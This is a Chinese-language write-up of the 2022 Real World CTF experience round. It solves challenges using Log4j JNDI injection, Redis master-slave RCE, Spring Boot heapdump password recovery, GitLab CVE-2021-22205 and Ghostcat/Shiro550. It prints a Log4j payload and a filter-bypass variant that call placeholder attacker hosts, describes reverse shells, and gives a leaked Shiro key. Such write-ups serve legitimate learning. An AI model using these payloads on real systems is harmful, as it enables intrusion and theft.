web安全|2022 Real World CTF体验赛Writeup CTF|安全|web安全

还是太菜了不配打Real World正赛(神仙打架)，打打体验赛压压惊。

文章图片

log4flag

文章图片

文章图片

提示log4j，测试payload：${jndi:rmi://xxx.dnslog.cn/Exp}

文章图片

存在检测,bypass payload:${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.xxx.xxx.xxx:1099/siavc8}
直接搭建jndi服务，尝试反弹shell

文章图片

文章图片

flag:rwctf{d4b4b837f95542aa93b43ee280b230d8}
Be-a-Database-Hacker

文章图片

根据提示，6379反弹，很明显的redis。
获取题目地址后
测试是否存在未授权访问

文章图片

很明显存在未授权访问，而且redis版本<5.0.5,这里可以使用redis主从复制进行RCE。

文章图片

文章图片

flag:rwctf{c4374dba71fbf50144f7a1a04b7f5837}
the Secrets of Memory

文章图片

文章图片

tips很明显了，Spring Boot Actuator的RCE

文章图片

访问/actuator/env的时候，actuator 会将一些带有敏感关键词 (如 password、secret) 的属性名对应的属性值用 ****** 号替换，以达到脱敏的效果。
而这里提示，flag就是password，而这里的password，已经脱敏。

文章图片

在目标既不出网，/jolokia 接口又没有合适的 MBean 或者不支持 POST 请求的情况下，很多获取被星号脱敏的密码的明文的方法就失效了。
这时候就可以利用 Eclipse Memory Analyzer 来分析 /heapdump 或 /actuator/heapdump 接口下载的 jvm heap 信息，查找密码明文。
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))

文章图片

flag:rwctf{d597d5defdd22829d8587efb9f9d0954}
baby flaglab

文章图片

文章图片

考点是Gitlab的一个CVE:CVE-2021-22205,直接echo 写反弹shell 到 tmp目录然后赋予执行权限然后执行就可以。

文章图片

文章图片

flag：rwctf{4edb62cb7b37d647e13bfed4f8d4b860}
Ghost shiro

文章图片

这个环境现在一直起不来，很迷。
讲下解题思路吧，shiro，但不是默认key
首先通过tomcat Ghostcat(CVE-2020-1938)漏洞读取shiro.ini配置文件，得到key：ODN6dDZxNzh5ejB6YTRseg==
接着直接打shiro550漏洞即可。
Flag Console